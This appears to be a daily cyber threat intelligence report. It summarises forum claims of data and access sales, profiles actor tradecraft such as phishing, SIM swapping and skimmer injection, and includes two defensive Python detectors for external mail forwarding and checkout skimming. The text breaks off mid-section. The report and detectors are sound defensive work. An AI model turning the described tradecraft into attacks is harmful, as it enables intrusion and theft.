I. Executive Summary
The cybersecurity landscape observed over the last 24 hours indicates a dynamic and increasingly complex threat environment. Analysis of recent activities reveals a notable prevalence of financially motivated attacks, alongside the persistent and evolving operations of hacktivist groups and state-aligned actors. A significant development in the threat landscape is the growing sophistication of adversary tactics, which now frequently incorporate advanced techniques such as AI-driven tools and highly refined social engineering. These methods are employed to achieve diverse objectives, ranging from large-scale data exfiltration and ransomware deployment to sophisticated espionage and the disruption of critical services across various sectors.
Key threat actor activities highlight the adaptability of malicious entities. Groups like the TA829/UNK_GreenSec cluster demonstrate a blurring of traditional lines between state-sponsored espionage and financially motivated cybercrime. The emergence of new ransomware operations, such as Hellcat (led by Pryx), underscores the continued proliferation and evolution of Ransomware-as-a-Service (RaaS) models. These trends collectively pose substantial risks, including widespread business disruption, significant financial losses, and severe reputational damage across industries such as critical infrastructure, financial services, and e-commerce.
A notable observation from recent intelligence is the increasing convergence of motives among sophisticated threat actors. Traditionally, adversaries were often categorized distinctly as either state-sponsored or purely financially driven [1]. However, groups such as TA829 exemplify a hybrid model, exhibiting capabilities and objectives that span both espionage and financial gain. This Russia-aligned group, for instance, engages in activities that serve geopolitical interests while simultaneously pursuing monetary objectives through cybercrime [5]. This evolving operational model implies that organizations can no longer rely on a singular defensive posture tailored to one type of adversary motivation. Instead, a comprehensive threat intelligence approach is necessary, one that accounts for the full spectrum of potential adversary goals, even from a single entity. The ability of state interests to leverage cybercriminal capabilities for funding or deniability, and vice versa, further complicates attribution and defense, requiring a more integrated and adaptive security strategy [7].
Another significant observation is the continuous proliferation and evolution of Ransomware-as-a-Service (RaaS) models. The emergence of new groups like Hellcat, led by the actor Pryx, and the activity of RA GROUP leveraging leaked Babuk ransomware source code, illustrate a rapidly expanding ecosystem [8]. These RaaS operations lower the barrier to entry for aspiring cybercriminals, enabling individuals or smaller groups with less technical sophistication to deploy potent and destructive tools. The rapid development of new variants and the adoption of multi-extortion tactics, such as double extortion (stealing data before encrypting) and even triple extortion (adding threats like Distributed Denial of Service, or DDoS, attacks), signify a highly adaptable and financially driven criminal landscape [8]. This dynamic environment means that even if a major ransomware group is disrupted or dismantled, new entities can quickly emerge to fill the void, often by repurposing existing tools or leaked code. Consequently, continuous monitoring of emerging ransomware variants and their associated tactics, techniques, and procedures (TTPs) is paramount, shifting the focus from merely tracking established names to understanding the underlying RaaS infrastructure and its rapid evolution.
II. Recent Cybersecurity Incidents Overview
This section provides a summary of cybersecurity incidents reported in the last 24 hours.
- Incident 1:
- Summary of the Breach: The threat actor claims to be selling unauthorized access to a Pulse Secure VPN allegedly connected to a regional hospital network in the United States healthcare sector. This access could allow unauthorized entry into sensitive hospital systems, posing significant risks to patient data, healthcare operations, and overall network security.
- Associated Threat Actor(s): XManX
- Relevant Links:
- Published URL: https://darkforums.st/Thread-Selling-Access-Pulse-Secure-VPN
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/005bef94-2a9d-41fb-ae21-cbf7d05462f3.png
- Initial Observations: This incident highlights the ongoing vulnerability of VPN infrastructure in the healthcare sector to initial access attacks, underscoring the need for enhanced security measures and patch management.
- Incident 2:
- Summary of the Breach: The threat actor claims to be selling a database allegedly belonging to Rekhatama. The compromised data includes sensitive personal and organizational information, such as full names, business entities, regional codes, phone numbers, email addresses, tokens, and status records.
- Associated Threat Actor(s): RXY
- Relevant Links:
- Published URL: https://darkforums.st/Thread-Source-Code-DATA-BASE-PEMILIH-REKHATAMA-INDONESIA-536
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/7a4b001d-e3dd-4a2b-8abb-1f55a3cd7863.png
- Initial Observations: The tactics employed in this breach suggest a focus on data exfiltration from IT services, indicating a potential shift in targeting methodologies within the information technology sector.
- Incident 3:
- Summary of the Breach: The threat actor is offering Free WordPress access to a mix of 300 WordPress sites.
- Associated Threat Actor(s): Format
- Relevant Links:
- Published URL: https://forum.exploit.in/topic/261942/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/3e4af9d0-d13d-4dfd-ac23-414b80b806ba.png
- Initial Observations: This incident highlights the widespread vulnerability of WordPress sites to unauthorized access, emphasizing the need for robust access controls and regular security audits for web platforms.
- Incident 4:
- Summary of the Breach: The threat actor claims to be selling full root access to a Linux server hosted on Alibaba Cloud ECS, linked to a legitimate Shanghai-based trading company's .org domain, which prominently displays China's national emblem on its public license page. The access is marketed as ideal for long-term covert operations because of the aged infrastructure and credible domain.
- Associated Threat Actor(s): x214
- Relevant Links:
- Published URL: https://xss.is/threads/141285/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/6adae0ff-0710-4e76-b737-1d409f14d02d.png, https://d34iuop8pidsy8.cloudfront.net/255a1dbb-9311-4e49-816c-71f538d5729b.png, https://d34iuop8pidsy8.cloudfront.net/ee9fce55-49b4-4b20-8a16-125dea862189.png
- Initial Observations: This incident points to the targeting of cloud-hosted Linux servers for root access, suggesting a focus on gaining deep control over infrastructure for potential long-term malicious operations.
- Incident 5:
- Summary of the Breach: A recent post by the group indicates that they are targeting a traffic control network in the United States.
- Associated Threat Actor(s): Golden falcon
- Relevant Links:
- Published URL: https://t.me/Golden_falcon_team/419
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/1baab7f6-38ae-4b60-b094-35aba2231786.png
- Initial Observations: This alert highlights a potential threat to critical infrastructure, specifically traffic control networks, in the United States, emphasizing the need for heightened vigilance in this sector.
- Incident 6:
- Summary of the Breach: The threat actor claims to be selling a database allegedly belonging to a UAE-based farming company. The compromised data includes 3.5GB of private and confidential information in SQL format, such as full names, addresses, company details, emails, and phone numbers.
- Associated Threat Actor(s): DAYzer0DAY
- Relevant Links:
- Published URL: https://darkforums.st/Thread-UAE-farms-company-database
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/8d0581bc-37a9-4fe8-b089-918e4d32fd7c.png, https://d34iuop8pidsy8.cloudfront.net/9363c245-a778-495b-b2a1-b56b2a6e704f.png
- Initial Observations: This data leak from an agriculture and farming company in the UAE underscores the vulnerability of diverse industries to data exfiltration, even those not traditionally considered high-risk.
- Incident 7:
- Summary of the Breach: The group claims to have defaced the website of the Khyber Pakhtunkhwa Information Technology Board.
- Associated Threat Actor(s): Team insane Pakistan
- Relevant Links:
- Published URL: https://t.me/xxl33t1337xx/70
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/cf7fc923-3eba-48be-a237-fe8ef978ac8e.png
- Initial Observations: This defacement incident targeting a government administration entity in Pakistan highlights the ongoing activity of hacktivist groups seeking to disrupt and gain notoriety through website compromises.
- Incident 8:
- Summary of the Breach: The threat actor claims to have leaked data of Sindh Law Department. The compromised database contains 2,056 user records, including CNIC, court case info, full names, designations, dates of birth, joining and retirement, domicile, and place of posting.
- Associated Threat Actor(s): uber
- Relevant Links:
- Published URL: https://kittyforums.to/thread/538?__cf_chl_tk=iYjqc4wA3_Exf1VlP_E.t2mOw8n6tduX5JojzfCF03U-1751712683-1.0.1.1-glkyVtptL6GGJzolzK7.HiPr1gAzmVJGihE5KbR.ZT4
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/2f893591-a9f2-44d5-8806-181f68e84163.png
- Initial Observations: This data leak from a government administration department in Pakistan emphasizes the risk of sensitive personal and official records being exposed, necessitating robust data protection for public sector entities.
- Incident 9:
- Summary of the Breach: The threat actor claims to have leaked a database allegedly belonging to Jektis Travel. The compromised data reportedly includes payment logs, reservation system records, admin account credentials and access to internal booking portals.
- Associated Threat Actor(s): mecrobyte
- Relevant Links:
- Published URL: https://darkforums.st/Thread-leak-Jektis-Travel-Agencey-Of-Tunisia-DATA
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/45765c64-c21a-4121-80f9-4fd3c63f8914.png
- Initial Observations: This data breach in the hospitality and tourism sector highlights the vulnerability of booking and payment systems, posing significant risks to customer financial data and operational integrity.
- Incident 10:
- Summary of the Breach: The threat actor claims to be selling a database allegedly belonging to Baggi. The compromised data reportedly contains information on 21,784 users, including personal details.
- Associated Threat Actor(s): ParanoidHax
- Relevant Links:
- Published URL: https://darkforums.st/Thread-BaggiNepal-com-Nepal-Transport-App
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/6f049e37-ae4e-4ad9-a36b-30ed359f8fa3.png
- Initial Observations: This data breach in the transportation and logistics sector underscores the ongoing threat to user databases, emphasizing the need for strong data security for mobile applications and online services.
- Incident 11:
- Summary of the Breach: The threat actor claims to be selling a large collection of gambling-related databases allegedly containing information on over 5 million international casino players. The leaked data includes both public and private player records from various online casinos, such as client names, contact details, and activity history. The data is offered for sale in multiple spreadsheet files and reportedly includes VIP player profiles.
- Associated Threat Actor(s): BlackElite
- Relevant Links:
- Published URL: https://xss.is/threads/141288/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/7873fb8f-434b-4eee-83ed-076cff481800.png, https://d34iuop8pidsy8.cloudfront.net/50fdee49-7917-480d-b018-bf298b0c3afe.png
- Initial Observations: This large-scale data leak targeting the gambling and casinos industry highlights the significant financial motivation of threat actors and the broad impact on personal and activity data of millions of users.
- Incident 12:
- Summary of the Breach: A recent post by the group indicates that they are targeting the Kazakh government.
- Associated Threat Actor(s): SYLHET GANG-SG
- Relevant Links:
- Published URL: https://t.me/SylhetGangSG1/6721
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/85fa3c1d-e077-4e9d-be5a-86a03f56d75d.png
- Initial Observations: This alert signifies a potential hacktivist or state-sponsored threat against the Kazakh Government, underscoring the geopolitical motivations behind some cyberattacks.
- Incident 13:
- Summary of the Breach: The threat actor claims to have fully compromised the mobile application of Morocco’s CNSS (Caisse Nationale de Sécurité Sociale). The attacker reports bypassing all security layers, including encryption, root detection, and certificate verification, exposing sensitive internal data such as Firebase configurations, API endpoints, authentication token flows, and session identifiers. The application is now reportedly vulnerable to logic abuse and API exploitation.
- Associated Threat Actor(s): darkMods
- Relevant Links:
- Published URL: https://darkforums.st/Thread-Document-Morocco-CNSS-App-Fully-Decrypted-%E2%80%93-Static-Analysis-All-Security-Layers-Bypassed
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/553707ad-b630-447b-a68e-64182c81ef6c.png
- Initial Observations: This data breach targeting a government and public sector mobile application in Morocco highlights the critical need for comprehensive security testing of mobile applications, including API and logic flaw assessments.
- Incident 14:
- Summary of the Breach: The threat actor claims to be selling a database allegedly belonging to Street Style Store. The compromised data reportedly includes over 1.1M customer records and 2.2M order entries, such as names, phone numbers, email addresses, order details and more.
- Associated Threat Actor(s): PremiumDataOnly
- Relevant Links:
- Published URL: https://darkforums.st/Thread-%F0%9F%94%B4-streetstylestore-com-Customer-Sales-Database-for-Sale-1-1-Million-Customer
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/2da24517-6908-4dbd-8b4c-65966a38c777.png
- Initial Observations: This large-scale data sale from an e-commerce and online store in India underscores the significant financial incentive for threat actors to target customer and order databases, impacting millions of individuals.
- Incident 15:
- Summary of the Breach: The threat actor claims to have leaked data of Otter. The compromised database contains 262,000 records.
- Associated Threat Actor(s): systemxp
- Relevant Links:
- Published URL: https://forum.exploit.in/topic/261939/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/10757864-1de6-4877-a7fc-dfd493020dba.png
- Initial Observations: This data leak from a retail industry organization in Romania highlights the persistent threat of data compromise, even for smaller datasets, emphasizing the need for robust data protection measures.
- Incident 16:
- Summary of the Breach: The threat actor claims to be selling a database allegedly belonging to Rolex. The compromised data includes 14.5GB of private and personal confidential information, such as client documents, budgets, payroll records, IDs, tax files, and financial data.
- Associated Threat Actor(s): G_mic
- Relevant Links:
- Published URL: https://darkforums.st/Thread-Rolex-Full-data
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/93b06428-ef60-4da0-8649-23e5510cf891.png
- Initial Observations: This significant data sale from a luxury goods and jewelry company in Switzerland indicates a high-value target for financially motivated threat actors, with a broad range of sensitive corporate and personal data at risk.
- Incident 17:
- Summary of the Breach: The group claims to have defaced the website of Biz Hotel Apartments. Mirror: https://www.zone-h.org/mirror/id/41408439
- Associated Threat Actor(s): Liwaa Muhammad
- Relevant Links:
- Published URL: https://t.me/liwaamohammad/462
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/d05db408-aaae-410e-8835-c862ecb045c4.png
- Initial Observations: This defacement incident targeting a hospitality and tourism entity in Saudi Arabia highlights the continued use of defacement as a tactic by hacktivist groups to make a statement or gain visibility.
- Incident 18:
- Summary of the Breach: The threat actor claims to sell effective Anti-VM.
- Associated Threat Actor(s): DEKAn272
- Relevant Links:
- Published URL: https://xss.is/threads/141282/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/30e87d32-d6fd-4f73-b3ff-a3cbbfa7a746.png
- Initial Observations: This incident points to the sale of anti-VM capabilities, indicating the ongoing development and trade of tools designed to evade security analysis and enhance the stealth of malicious software.
- Incident 19:
- Summary of the Breach: The threat actor claims to be selling the entire source code and database of PT Samisurya Indah. The database appears to contain extensive sensitive information, including usernames, passwords, email addresses, personal details (such as full name, address, phone number and gender), order information, payment methods, and product data. The leaked content also includes web configuration data, suggesting the breach may have exposed both backend and frontend components of their e-commerce system.
- Associated Threat Actor(s): Putra26
- Relevant Links:
- Published URL: https://darkforums.st/Thread-Source-Code-PT-SAMISURYA-INDAH-WWW-SAMISURYA-CO-ID
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/4785089b-290e-469f-9de6-159d154c4e5d.png
- Initial Observations: This data breach involving source code and a database from a manufacturing company in Indonesia highlights the severe impact of such compromises, potentially exposing intellectual property and critical system vulnerabilities.
- Incident 20:
- Summary of the Breach: The threat actor claims to be selling a leaked Israeli government database allegedly containing the personal information of 800,000 individuals. The compromised data includes full names, phone numbers, email addresses, physical addresses, login credentials, registration dates, and payment status, among other sensitive fields. The data appears to be in structured format (CSV or similar) and includes details of citizens and possibly government-affiliated individuals.
- Associated Threat Actor(s): DigitalGhost
- Relevant Links:
- Published URL: https://darkforums.st/Thread-800K-GOV-IL-DATABASE
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/a8dee479-c30b-4343-ae59-0165c0a35aa2.png, https://d34iuop8pidsy8.cloudfront.net/d73da93a-c9d8-4bf4-80d9-887fd9ff77ac.png
- Initial Observations: This significant data breach targeting an Israeli government administration entity underscores the high-value nature of government databases for threat actors, with potential implications for national security and citizen privacy.
- Incident 21:
- Summary of the Breach: The group claims to have defaced the website of My ESevai.
- Associated Threat Actor(s): BABAYO EROR SYSTEM
- Relevant Links:
- Published URL: https://t.me/CyberBabayoEror/751
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/edec6a8e-68b3-4ee4-8d96-68bf4c59ccbc.png
- Initial Observations: This defacement incident targeting a government administration website in India indicates the continued activity of hacktivist groups aiming to disrupt and gain attention through website compromises.
- Incident 22:
- Summary of the Breach: The threat actor claims to have leaked data related to Israel and Egypt.
- Associated Threat Actor(s): Tunisian Maskers Cyber Force
- Relevant Links:
- Published URL: https://t.me/CyberforceTn/272
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/09ac83b4-e295-423e-b12e-fc05134e367a.png
- Initial Observations: This alleged data leak concerning Israel and Egypt highlights the geopolitical motivations that can drive cyber activities, potentially impacting multiple nations.
- Incident 23:
- Summary of the Breach: The group claims to have access to the admin panels of multiple Brazilian organizations.
- Associated Threat Actor(s): YTL
- Relevant Links:
- Published URL: https://ramp4u.io/threads/2-000-to-25-000-rewards-for-hacking-the-sites-in-this-topic-%D0%9D%D0%B0%D0%B3%D1%80%D0%B0%D0%B4%D1%8B-%D0%B7%D0%B0-%D0%B2%D0%B7%D0%BB%D0%BE%D0%BC-%D1%81%D0%B0%D0%B9%D1%82%D0%BE%D0%B2-%D0%B2-%D1%8D%D1%82%D0%BE%D0%B9-%D1%82%D0%B5%D0%BC%D0%B5.3253/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/b8ca9d9c-8d13-4a2f-b1c3-0256e4c42833.jpg
- Initial Observations: This incident involving alleged admin access to multiple Brazilian organizations underscores the persistent threat of initial access brokers and the need for robust access management across all sectors.
- Incident 24:
- Summary of the Breach: A recent post by the group claims they are targeting critical infrastructure linked to Israeli banks. They plan to publish IP addresses, port details, and member information, along with a custom DDoS tool to facilitate coordinated attacks.
- Associated Threat Actor(s): Assasins
- Relevant Links:
- Published URL: https://t.me/Assasins_Official/74
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/7a721c36-7536-4c4d-bcf0-a72e6679298d.png
- Initial Observations: This alert highlights a direct threat to critical financial services infrastructure in Israel, indicating a potential for disruptive attacks and the need for enhanced defensive measures against coordinated cyber operations.
- Incident 25:
- Summary of the Breach: The threat actor claims to have breached Blue Bus Egypt, leaking a list of customer records with personal contact details. Some entries include national IDs or passport numbers.
- Associated Threat Actor(s): stepbro
- Relevant Links:
- Published URL: https://xss.is/threads/141275/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/80db0cfb-c178-4ad6-9157-51dd6718d033.png, https://d34iuop8pidsy8.cloudfront.net/ecb2c40c-9993-41f5-a4fe-c841032818da.png
- Initial Observations: This data breach in the transportation and logistics sector in Egypt highlights the risk of sensitive customer data, including national IDs, being exposed, emphasizing the need for stringent data privacy and security protocols.
- Incident 26:
- Summary of the Breach: The threat actor claims to be selling a user data database from Mahsoly, Egypt, containing 42,000 records. The leaked dataset includes user details such as usernames, full names (in both English and Arabic), email addresses, and Egyptian mobile numbers.
- Associated Threat Actor(s): stepbro
- Relevant Links:
- Published URL: https://xss.is/threads/141276/
- Screenshots: https://d34iuop8pidsy8.cloudfront.net/163029ec-6348-40ad-adb7-f0ed9c892a71.png
- Initial Observations: This data breach from a government administration entity in Egypt underscores the ongoing threat to public sector databases, with personal user information being a prime target for sale on illicit forums.
Table 1: Daily Breach Summary
This table offers a concise, digestible overview of all reported incidents, facilitating rapid assessment for cybersecurity professionals. It enables immediate identification of impacted sectors, responsible parties, and the overall scope of the day’s events.
III. In-Depth Threat Actor Profiles
This section provides detailed profiles of the unique threat actors identified in recent incidents, offering comprehensive context on their operations, motivations, and historical activities.
Threat Actor: TA829 / UNK_GreenSec
TA829, also known by aliases such as CIGAR, Nebulous Mantis, Storm-0978, Tropical Scorpius, UAC-0180, UAT-5647, UNC2596, and Void Rabisu, is a Russia-aligned hybrid group that stands out in the threat landscape due to its dual capacity for both espionage and financially motivated attacks [5]. UNK_GreenSec is a cluster name associated with activities that show significant overlap with TA829, suggesting a close relationship, possibly as an infrastructure provider that occasionally deploys its own malware, or even as a new facet of the same entity [5].
The primary motivations for TA829 appear to be a blend of geopolitical objectives, aligning with Russian state interests for espionage, and direct financial gain through cybercriminal operations [5]. This hybrid approach allows the group to pursue diverse strategic goals while potentially self-funding its operations or providing deniability for state-sponsored activities.
The group's tactics, techniques, and procedures (TTPs) are characterized by sophisticated initial access methods. They heavily rely on elaborate phishing campaigns, which involve plaintext email messages, actor-controlled domains, and redirectors that lead targets to spoofed cloud storage landing pages, such as fake Google Drive or Microsoft OneDrive interfaces [5]. To facilitate these large-scale campaigns, they utilize REM Proxy services for email routing and freemail providers for bulk message dissemination, often employing generic sender address patterns to automate the process [5]. Beyond phishing, TA829 is also known for exploiting zero-day vulnerabilities in widely used platforms like Mozilla Firefox and Microsoft Windows to gain initial footholds [5].
Once initial access is established, TA829 and UNK_GreenSec employ living-off-the-land (LOTL) tactics, leveraging legitimate system tools to blend in with normal network activity [5]. They maintain persistence and control through encrypted command-and-control (C2) communications and utilize tools such as PuTTY's plink to set up SSH tunnels, further obfuscating their network traffic. Payload delivery and subsequent activities often involve IPFS (InterPlanetary File System) for hosting utilities, making detection more challenging [5]. Evasion techniques are also central to their operations; UNK_GreenSec, in particular, has been observed using improved filtering and obfuscation measures, including server-side filtering via Cloudflare services, a tactic later adopted by TA829, to thwart automated analysis by security researchers [6].
Historically, TA829's campaigns have shown increasing frequency and sophistication since February 2025 [6]. UNK_GreenSec first came to light in February 2025, when it was documented delivering Morpheus ransomware, a rebranded version of HellCat ransomware, against an American law firm [5]. The malware arsenal associated with this cluster includes RomCom RAT, DustyHammock, TransferLoader (which delivers Morpheus ransomware), MeltingClaw (also known as DAMASCENED PEACOCK), RustyClaw, ShadyHammock, and SingleCamper (an updated version of RomCom RAT, also known as SnipBot) [5]. The shared TTPs and infrastructure between TA829 and UNK_GreenSec suggest a very likely link between the groups, whether as collaborators, shared resource users, or a single evolving entity [5].
Threat Actor: LAPSUS$
LAPSUS$, also identified by Microsoft as Strawberry Tempest, is an international extortion-focused hacker group that has gained notoriety for its cyberattacks against major technology companies and government agencies [13]. The group's activities have been observed across multiple countries, with arrests of members reported in Brazil and the UK in 2022 [14].
LAPSUS$ is primarily motivated by financial extortion, seeking to obtain sensitive data and then demanding ransom to prevent its public release [14]. Their operational model centers on gaining initial access to a victim organization's corporate network by acquiring credentials from privileged employees. This is achieved through a variety of attack vectors, including social engineering, multi-factor authentication (MFA) fatigue attacks, and SIM swapping [13]. Once credentials are obtained, the group leverages remote desktop tools to navigate within the compromised network and exfiltrate sensitive information [14]. In some instances, they have been observed creating new global administrator accounts or virtual machines as tooling servers to further their attacks and hinder recovery efforts [13]. They have also established organization-wide email transport rules to redirect emails to attacker-controlled accounts and removed other global administrator accounts to impede victim recovery [13].
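The organization-wide transport rules described above are a useful detection point: a mail-flow rule that redirects, forwards or blind-copies messages to a domain the organization does not own should be rare and reviewable. The following is an added example written for this report, not code from any source it cites. It runs over rule records exported from a mail platform; the field names are modelled loosely on Exchange transport and inbox rule attributes (an assumption), and the accepted domains, rule names and addresses are all constructed.

```python
"""Added example: flag mail-flow rules that send copies or redirects outside the organization.

Assumptions (constructed for this example): ACCEPTED_DOMAINS lists the tenant's own mail
domains, and each rule is a dict whose action keys resemble Exchange rule attributes.
"""

ACCEPTED_DOMAINS = {"corp.example", "mail.corp.example"}  # assumption: the organization's domains

# Action keys modelled loosely on Exchange transport/inbox rule attributes (assumption).
FORWARDING_ACTIONS = ("RedirectMessageTo", "BlindCopyTo", "ForwardTo", "ForwardAsAttachmentTo")


def is_external(address, accepted=ACCEPTED_DOMAINS):
    """True when the address domain is neither an accepted domain nor a subdomain of one.
    Lookalikes such as corp.example.attacker-mail.example are treated as external."""
    domain = address.rsplit("@", 1)[-1].strip().lower()
    return not any(domain == d or domain.endswith("." + d) for d in accepted)


def find_external_forwarding(rules, accepted=ACCEPTED_DOMAINS):
    """Return one finding per enabled rule action that targets an external address.
    Organization-wide rules are rated high because a single rule copies everyone's mail."""
    findings = []
    for rule in rules:
        if rule.get("State", "Enabled") != "Enabled":
            continue  # disabled rules are still worth a look, but are not exfiltrating now
        scope = rule.get("Scope", "mailbox")
        for action in FORWARDING_ACTIONS:
            for target in rule.get(action) or []:
                if is_external(target, accepted):
                    findings.append({
                        "rule": rule["Name"],
                        "scope": scope,
                        "action": action,
                        "target": target,
                        "severity": "high" if scope == "organization" else "medium",
                    })
    return findings


# Constructed sample export: one benign internal BCC, one suspicious org-wide redirect,
# one disabled leftover, one personal forward from a single mailbox, and one lookalike domain.
SAMPLE_RULES = [
    {"Name": "Legal hold copy", "Scope": "organization", "State": "Enabled",
     "BlindCopyTo": ["archive@mail.corp.example"]},
    {"Name": "Sync", "Scope": "organization", "State": "Enabled",
     "RedirectMessageTo": ["collector@attacker-mail.example"]},
    {"Name": "Old test", "Scope": "organization", "State": "Disabled",
     "RedirectMessageTo": ["someone@elsewhere.example"]},
    {"Name": "Vacation", "Scope": "mailbox", "Owner": "j.doe@corp.example",
     "ForwardTo": ["j.doe@personal-mail.example"]},
    {"Name": "Ops copy", "Scope": "organization", "State": "Enabled",
     "BlindCopyTo": ["ops@corp.example.attacker-mail.example"]},
]

if __name__ == "__main__":
    for f in find_external_forwarding(SAMPLE_RULES):
        print(f"[{f['severity']}] {f['rule']} ({f['scope']}): {f['action']} -> {f['target']}")
```

In practice the input would be the JSON export of the tenant's transport and inbox rules; the point of the check is that the allowlist is the organization's own domains, so any new external target, including a lookalike of those domains, surfaces for review rather than being matched against a list of known-bad addresses.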
Notable incidents attributed to LAPSUS$ include breaches against Brazil's Ministry of Health (2021), where they exfiltrated and deleted 50 TB of data, and attacks on Okta (2022), Nvidia (2022), and Samsung (2022) [14]. The attack on Uber in September 2022, for instance, involved a successful phishing campaign that allowed the attacker to gain high-privilege credentials and compromise multiple internal services and tools, with the attacker publicly sharing screenshots of the compromised systems [13]. Despite being considered inactive by April 2022, the group reportedly re-emerged in September 2022 with a new series of data breaches, though subsequent arrests may have led to members dispersing to other groups [14].
Threat Actor: Magecart
Magecart refers to a collective of multiple hacker groups specializing in online skimming techniques, primarily aimed at stealing customer details and credit card information from websites that process online payments [16]. The name itself is derived from their initial focus on the Magento e-commerce platform, which provides shopping cart functionality [17].
The primary motivation behind Magecart attacks is financial gain through the theft and subsequent sale of payment card data and personally identifiable information (PII) [17]. These groups are persistent and have diversified their methods and targets over time. Initially, they focused exclusively on Magento vulnerabilities, but their operations have expanded to other e-commerce platforms and third-party services [18].
Magecart groups employ various TTPs, with formjacking (digital skimming) being their predominant method [17]. This involves injecting malicious code, often JavaScript skimmers, directly into e-commerce checkout pages. This malicious code is designed to capture payment card details as customers enter them. Attackers have innovated their injection techniques, including embedding skimmer code within image files to mimic legitimate "favicons" or modifying file paths to load malicious PHP web shell scripts on compromised servers [18]. This server-side injection makes detection more difficult. They also create convincing fraudulent modal forms or fake checkout pages that perfectly mimic legitimate ones, sometimes even offering a smoother user experience than the original, to trick victims into submitting their details [16]. After capturing the data, a fake error message might be displayed, and the user is redirected to the real payment URL, often unaware of the compromise [16]. To evade detection and ensure persistence, Magecart actors use obfuscated source code, pool IP addresses, and implement hidden system processes to restore skimmer code if it is removed [18].
Notable organizations targeted by Magecart include Magento, British Airways, Amazon S3 Buckets, and Hanna Andersson [17]. The British Airways breach, for example, involved copying and modifying JavaScript payment forms to exfiltrate data to attacker-controlled servers, affecting both website and mobile application users [17]. The persistence of Magecart attacks, which often go unnoticed until stolen credit cards appear on the dark web, underscores the importance of robust security measures for e-commerce platforms, including MFA for admin panels, secure iFrames for transactions, and regular security audits [17].
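Because a skimmer injection changes what a checkout page loads or where its forms submit, one of the regular audits mentioned above can be a baseline comparison of the rendered checkout HTML. The following is an added example written for this report, not code from any source it cites: it parses a checkout page and flags scripts from origins outside an allowlist, first-party scripts without Subresource Integrity, inline scripts whose hash is not in a known-good baseline, and forms that post off-origin. The origins, the baseline hash and the sample page are all constructed.

```python
"""Added example: static audit of a checkout page for the changes a JavaScript skimmer introduces.

Assumptions (constructed for this example): PAGE_ORIGIN is the store's own origin,
ALLOWED_ORIGINS lists approved script/form hosts, and KNOWN_INLINE_SHA256 is a baseline
of approved inline script hashes captured from a clean deployment.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

PAGE_ORIGIN = "https://shop.example"                      # assumption: the store's origin
ALLOWED_ORIGINS = {PAGE_ORIGIN, "https://cdn.example"}   # assumption: approved hosts
KNOWN_INLINE_SHA256 = {                                   # assumption: clean-deployment baseline
    hashlib.sha256(b"window.cartTotal = 0;").hexdigest(),
}


class _CheckoutCollector(HTMLParser):
    """Collects <script> elements (src, integrity, inline body) and <form action> targets."""

    def __init__(self):
        super().__init__()
        self.scripts, self.form_actions = [], []
        self._open = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._open = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")

    def handle_data(self, data):
        if self._open is not None:  # html.parser delivers <script> text through handle_data
            self._open["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._open is not None:
            self.scripts.append(self._open)
            self._open = None


def script_origin(url, page_origin=PAGE_ORIGIN):
    """Resolve a src/action URL to an origin. Relative URLs (no host) are first-party;
    protocol-relative URLs (//host/path) inherit the page scheme so the host is still compared."""
    p = urlparse(url)
    if not p.netloc:
        return page_origin
    scheme = p.scheme or urlparse(page_origin).scheme
    return f"{scheme}://{p.netloc}"


def audit_checkout(html, allowed=ALLOWED_ORIGINS, known_inline=KNOWN_INLINE_SHA256):
    """Return (finding, detail) tuples; an empty list means the page matches the baseline."""
    c = _CheckoutCollector()
    c.feed(html)
    c.close()
    findings = []
    for s in c.scripts:
        if s["src"]:
            if script_origin(s["src"]) not in allowed:
                findings.append(("script-unexpected-origin", s["src"]))
            elif not s["integrity"]:
                findings.append(("script-missing-sri", s["src"]))
        else:
            digest = hashlib.sha256(s["body"].strip().encode()).hexdigest()
            if digest not in known_inline:
                findings.append(("inline-script-not-in-baseline", digest[:16]))
    for action in c.form_actions:
        if script_origin(action) not in allowed:
            findings.append(("form-posts-off-origin", action))
    return findings


# Constructed sample page: one clean CDN script, one first-party script without SRI, one
# baselined inline script, one unknown inline script, one off-origin script and one off-origin form.
SAMPLE_CHECKOUT_PAGE = """<html><head>
<script src="https://cdn.example/checkout.js" integrity="sha384-EXAMPLEONLY"></script>
<script src="/static/cart.js"></script>
<script>window.cartTotal = 0;</script>
<script>document.addEventListener("submit", function (e) { /* constructed unknown code */ });</script>
<script src="//stats-collector.example/s.js"></script>
</head><body>
<form action="/pay" method="post"></form>
<form action="https://payments-gateway.example/collect" method="post"></form>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in audit_checkout(SAMPLE_CHECKOUT_PAGE):
        print(f"{kind}: {detail}")
```

The audit is only as good as its baseline: the allowlist and inline hashes must be captured from a deployment that was verified clean, and re-captured on every release, otherwise a skimmer present at baseline time would be silently accepted. Enforcing the same allowlist at runtime with a Content-Security-Policy (`script-src` and `form-action`) turns the finding into a block rather than a report.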
Threat Actor: Pryx (Hellcat Ransomware)
